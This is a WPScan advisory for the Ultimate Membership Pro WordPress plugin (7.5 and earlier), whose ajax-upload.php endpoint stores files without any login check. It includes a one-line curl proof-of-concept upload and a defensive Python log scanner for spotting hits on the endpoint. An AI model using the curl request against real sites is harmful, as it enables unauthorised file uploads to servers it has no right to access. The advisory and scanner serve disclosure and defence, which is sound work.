indeed-membership-pro (Ultimate Membership Pro) <=7.5 arbitrary media upload

Description
The ajax-upload.php endpoint doesn't check the current user's capabilities (or even that they are logged in), so it accepts requests that should be rejected:

Without any credentials, you can simply POST the image file in the field ihc_file and it'll store it for you:

~$ curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
{"id":20,"url":"https:\/\/vulnerable.host\/wp-content\/uploads\/2019\/01\/some-image.png","secret":"81b3ce5c8991c26f067a6d32c1cf66ff","name":"some-image.png","type":"other"}

The usual WordPress media upload restrictions still apply, so how far this can be pushed will vary, but at minimum you probably don't want anonymous users uploading arbitrary media to your site.
Proof of Concept
curl -F "ihc_file=@some-image.png" https://vulnerable.host/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php
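Added example, not part of the WPVDB entry or the plugin: a small Python scanner that reads web server access-log lines in the common "combined" format and reports every POST to the ajax-upload.php path named above, grouped by source IP, so a site owner can check whether the endpoint was hit while a version at or below 7.5 was installed. The log lines embedded in it are constructed for the example.

```python
import re
from collections import defaultdict

# Endpoint named in the advisory: before 7.6 it stored uploads without any
# login or capability check, so every POST that reached it deserves review.
VULN_PATH = "/wp-content/plugins/indeed-membership-pro/public/ajax-upload.php"

# Apache/nginx "combined" access log format (only the fields we need are captured).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)

def parse_line(line):
    """Return a dict for one log line, or None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["path"] = rec["path"].split("?", 1)[0].lower()  # ignore query string and case
    return rec

def find_upload_hits(lines):
    """(ip, timestamp, status) for every POST to the vulnerable endpoint."""
    return [
        (r["ip"], r["ts"], r["status"])
        for r in map(parse_line, lines)
        if r and r["method"] == "POST" and r["path"] == VULN_PATH
    ]

def summarize(lines):
    """Per source IP: number of POSTs and how many returned 200 (upload likely stored)."""
    out = defaultdict(lambda: {"posts": 0, "accepted": 0})
    for ip, _ts, status in find_upload_hits(lines):
        out[ip]["posts"] += 1
        out[ip]["accepted"] += int(status == 200)
    return dict(out)

# Constructed sample traffic (not from a real server): two POSTs from one client,
# one accepted and one rejected, plus a GET probe that should not be counted.
SAMPLE_LOG = """\
203.0.113.5 - - [26/Feb/2019:10:01:02 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 161 "-" "curl/7.64.0"
203.0.113.5 - - [26/Feb/2019:10:01:09 +0000] "POST /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php?x=1 HTTP/1.1" 403 0 "-" "curl/7.64.0"
198.51.100.7 - - [26/Feb/2019:10:02:00 +0000] "GET /wp-content/plugins/indeed-membership-pro/public/ajax-upload.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
198.51.100.7 - - [26/Feb/2019:10:02:05 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    for ip, stats in summarize(SAMPLE_LOG).items():
        print(f"{ip}: {stats['posts']} POST(s) to ajax-upload.php, {stats['accepted']} accepted")
```

A 200 response on its own does not prove a file was stored; correlate any hits with unexpected entries in wp-content/uploads and the media library.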

Affects Plugin

fixed in version 7.6

References

URL https://codecanyon.net/comments/21539595

Classification

Type UPLOAD
CWE CWE-434

Miscellaneous

Original Researcher James Fraser
Submitter fwaggle
Submitter Twitter fwaggle
Verified No
WPVDB ID 9293

Timeline

Publicly Published 2019-02-26 (4 months ago)
Added 2019-05-27 (23 days ago)
Last Updated 2019-05-27 (23 days ago)

Copyright & License

Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.